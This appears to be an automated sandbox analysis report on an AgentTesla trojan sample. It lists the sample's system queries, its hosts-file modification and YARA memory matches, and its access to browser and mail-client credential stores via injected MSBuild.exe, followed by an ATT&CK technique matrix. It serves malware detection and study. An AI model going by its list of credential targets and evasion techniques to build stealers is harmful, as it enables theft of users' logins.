                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Queries volume information: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll | VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll | VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography | MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File written: C:\Windows\System32\drivers\etc\hosts

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
                    Source: Yara match | File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: Yara match | File source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
                    Source: Yara match | File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
                    MITRE ATT&CK Matrix (number before a technique name is the count badge shown for that cell; empty cells left blank)

                    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                    Valid Accounts | 211 Windows Management Instrumentation | 1 Scheduled Task/Job | 212 Process Injection | 1 File and Directory Permissions Modification | 1 OS Credential Dumping | 114 System Information Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Web Service | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                    Default Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Disable or Modify Tools | 211 Input Capture | 1 Query Registry | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                    Domain Accounts | 1 Scheduled Task/Job | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 211 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | 211 Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
                    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 23 Software Packing | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                    Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Timestomp | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                    External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 131 Virtualization/Sandbox Evasion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 212 Process Injection | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                    Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Hidden Files and Directories | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                    Behavior Graph (ID: 620228; Sample: SecuriteInfo.com.Trojan.MSI...; Start date: 04/05/2022; Architecture: WINDOWS; Score: 100)

